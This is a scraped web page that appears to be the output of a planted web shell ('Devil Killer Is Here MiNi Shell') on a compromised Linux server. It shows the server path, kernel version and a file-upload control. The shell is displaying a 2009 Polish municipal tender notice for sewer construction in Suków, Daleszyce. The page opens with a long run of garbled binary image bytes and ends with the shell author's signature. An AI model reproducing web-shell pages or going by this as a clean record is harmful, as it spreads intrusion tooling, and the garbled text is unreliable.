JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146985-N-2009.html

<p class="kh_header"><b>Daleszyce: Budowa kanalizacji sanitarnej z przyłączami i pompowniami ścieków dla miejscowości Suków, gm. Daleszyce - etap I</b><br>
<b>Numer ogłoszenia: 146985 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Daleszyce , pl. Staszica 9, 26-021 Daleszyce, woj. świętokrzyskie, tel. 0-41 3171693, faks 0-41 3171693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.daleszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej z przyłączami i pompowniami ścieków dla miejscowości Suków, gm. Daleszyce - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego opracowania jest budowa I etapu kanalizacji sanitarnej dla miejscowości Suków w gminie Daleszyce. Etap ten obejmuje główny ciąg kanalizacyjny
od miejsca włączenia (znajdująca się w budowie, kanalizacja sanitarna w miejscowości Podmarzysz) do miejscowości Suków Pastwiska, poprzez miejscowość Suków Papiernia (część południowa, stanowiąca zabudowę letniskową), Suków Modrzewie oraz Suków Rogatka. Pozostała część miejscowości: Suków tj. Babie, Suków Borki, Suków Działki oraz Suków Oborzysko objęte zostaną II i III etapem budowy kanalizacji. Odprowadzenie ścieków przewiduje się do mechaniczno - biologicznej oczyszczalni ścieków w Marzyszu, za pośrednictwem systemu kanalizacyjnego tej miejscowości. Z uwagi na ukształtowanie terenu projektuje się grawitacyjno - pompowy układ kanalizacyjny, z dwoma pompowniami sieciowymi i 1 pompownią przydomową.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.40-8, 45.23.21.52-2, 45.23.10.00-5, 45.23.13.00-8, 45.23.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości 
250.000,00 PLN (słownie złotych: dwieście pięćdziesiąt tysięcy). Wadium winno być wniesione w formie określonej w art. 45 ustawy Prawo zamówień publicznych.
W przypadku wnoszenia wadium w pieniądzu, należy wpłaty dokonać przelewem bankowym na niżej podane konto - wyklucza się wpłaty gotówką.
Dowód wniesienia wadium należy dołączyć do oferty.
Bank Spółdzielczy Daleszyce-Górno w Daleszycach na rachunek Gminy Daleszyce
 nr 04 8485 0009 0000 0130 9000 0002   z takim wyprzedzeniem, aby w dniu otwarcia ofert tj.  25 września 2009r do godz.  10 00 środki znalazły się na koncie Zamawiającego.
Zwrot lub utrata wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
Gwarancja bankowa lub ubezpieczeniowa musi zawierać w swojej treści zapis o realizacji gwarancji na rzecz Zamawiającego zgodnie z podstawami zatrzymania wadium zawartymi  w art. 46 ust 4a i 5 ustawy Prawo zamówień publicznych,

1.1. Zamawiający zatrzymuje wadium w przypadkach  opisanych w  art. 46 pkt 4a i 5 ustawy - Pzp<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O  udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy:

1)	posiadają uprawnienia  do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają   obowiązek posiadania    takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
       zdolnymi do wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do    udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	posiadają ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż   3 000 000,00zł,
5)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust. 1 i 2 Pzp, 
6)  spełniają warunki określone  art.22 ust.1 oraz inne wymagania określone w Pzp i SIWZ,
7)  w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  
      osiągnęli  średnie  roczne przychody  nie mniejsze niż 7 000 000,00zł rocznie. (dotyczy  lat 2006;2007               
      i 2008). Średnie roczne  przychody zostaną ustalone  przez zsumowanie przychodów  za każdy rok                    
      i podzielenie ich przez liczbę lat.

2.	Wykonawcy wspólnie ubiegający się  o zamówienie

1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia,
2)	W przypadku wspólnego ubiegania się o zamówienie, Wykonawcy ustanawiają  pełnomocnika  do reprezentowania ich w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego.
 Oferta winna zawierać oświadczenia i dokumenty opisane w części VII pkt.1 ppkt.2;3;4;5i 6  
i pkt. 2 ppkt  1 -7 oraz pkt 3 dla każdego  partnera z osobna, pozostałe   dokumenty składane są wspólnie.

3.	Zamawiający odrzuca ofertę Wykonawcy, jeżeli:

1) jest  niezgodna z ustawą ,
2)  jej treść nie odpowiada treści SIWZ,
5)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej 
      konkurencji,
4)  zawiera  rażąco niską cenę w stosunku do przedmiotu zamówienia,
5) została złożona przez Wykonawcę  wykluczonego z udziału w postępowaniu o udzielenie zamówienia ,
6)  zawiera  błędy w obliczeniu ceny,
7) Wykonawca w terminie 3 dni od dnia doręczenia  zawiadomienia nie zgodził się na poprawienie omyłki, polegającej na niezgodności oferty ze specyfikacją istotnych warunków zamówienia nie powodujących  istotnych zmian w treści oferty,
8) jest  nieważna  na  podstawie odrębnych przepisów.

4. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu                                 o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Celem potwierdzenia spełnienia warunków, stawianych Wykonawcom przez Zamawiającego oraz dla uznania formalnej  poprawności oferta musi zawierać następujące dokumenty:

1) formularz ofertowy (załącznik Nr 1 do SIWZ) - wypełniony i podpisany przez osoby uprawnione. 
2) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 
ust. 1, oraz że nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2  ustawy Prawo zamówień publicznych )załącznik Nr 2 do SIWZ),
3) aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzające odpowiednio, że Wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
5)  aktualnej informacji z  Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6) aktualnej informacji z  Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7) Wykonawca zobowiązany jest do wskazania w ofercie części zamówienia, której 
    wykonanie zamierza powierzyć podwykonawcom wg załącznika  nr 3.

2. Celem potwierdzenia spełnienia warunków, posiadania przez Wykonawcę niezbędnej wiedzy  i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  Zamawiający żąda przedstawienia  następujących dokumentów:

1) Wykazu wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania 
o udzielenie  zamówienia robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich  wartości, z których co najmniej dwa zadania o wartości nie mniejszej niż 2 500 000,00 zł.  każde, oraz daty i miejsca wykonania - załącznik nr 4. Do wykazu robót    należy   dołączyć   dokumenty   potwierdzające,   że   roboty  te  zostały  wykonane  należycie.
 2)  Wykaz niezbędnych do wykonania zamówienia  narzędzi i urządzeń jakimi dysponuje Wykonawca,  lub pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń  wg załącznika nr 5.
 3) Wykaz osób i podmiotów które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami  na temat ich  kwalifikacji zawodowych,  niezbędnych do wykonania  zamówienia    a także  zakresu wykonywanych przez nich czynności lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia wg załącznika nr 6.
 4) Uprawnień budowlanych oraz aktualnych zaświadczeń o przynależności do właściwej izby samorządu zawodowego stwierdzających, że osoba wymieniona w wykazie, wyznaczona do pełnienia  funkcji kierownika budowy posiada uprawnienia do kierowania robotami budowlanymi branż występujących w przedmiocie zamówienia.
5) Sprawozdania finansowego albo jego części  a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie  z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części  a w przypadku wykonawców nie zobowiązanych do sporządzania  sprawozdania  finansowego innych dokumentów  określających obroty oraz zobowiązania i należności za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia  działalności jest krótszy za ten okres.
6) Informacji banku  lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek  potwierdzającej wysokość posiadanych środków  finansowych lub zdolność kredytową wykonawcy w wysokości co najmniej 3 000 000,00zł, wystawionej nie wcześniej niż trzy miesiące przed upływem terminu składania  ofert. 
Uwaga:  nie uznaje się opinii bankowej zawierającej informacje o wysokości posiadanych  środków finansowych wyrażonych w postaci np. saldo wyraża się kwotą   xxxxxx - cyfrową lub zawierającej tylko informacje  o obrotach.
7) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż  3 000 000,00 zł (słownie: trzy miliony złotych). 

 3. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
a) zamiast dokumentów, o których mowa w pkt  1 -  składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
 - nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej                          niż 6 m-cy przed   upływem   terminu   składania ofert,
 - nie zalega  z uiszczaniem  podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie -  wystawione nie wcześniej  niż 6 m-cy przed   upływem   terminu   składania ofert,                          
 - zaświadczenie właściwego organu sądowego lub administracyjnego w kraju pochodzenia  albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym  w art. 24 ust.1 pkt. 4 do 8  ustawy Pzp, wystawione nie wcześniej  niż 6 m-cy przed   upływem   terminu   składania ofert,
3.1. Jeżeli  w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,  nie wydaje się dokumentów, o których mowa w pkt.3  zastępuje się je dokumentem  zawierającym  oświadczenie złożone przed notariuszem,  właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma  siedzibę lub miejsce zamieszkania, - terminy ważności dokumentów są tożsame z terminami wymienionymi w pkt.3.
4. Dokumenty wymagane w przypadku składania oferty wspólnej: 

 oferta winna zawierać oświadczenia i dokumenty opisane w części VII pkt.1 ppkt.2,3;4;5;6i7  i pkt.2 ppkt. 1 - 7  oraz  pkt. 3. dla każdego  partnera z osobna, pozostałe   dokumenty składane są wspólnie.

Ww. dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność z oryginałem przez Wykonawcę lub osobę/ osoby uprawnione do podpisywania oferty z dopiskiem  ) za zgodność z oryginałem).  Dokumenty sporządzone w języku obcym są składane  wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

Uwaga: W przypadku konsorcjum  kwoty w pozycjach dotyczących : wymaganej  wartości i ilości wykonanych robót,  średnich rocznych przychodów, zabezpieczenia kredytowego, ubezpieczenia oc wielkości uwidocznione przez poszczególnych uczestników konsorcjum w sumie  muszą Stanowić  wielkości wymienione w treści SIWZ ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.daleszyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Daleszycach
Plac Staszica 9
pokój 4 i 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Daleszycach
Plac Staszica 9
pokój nr 25 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com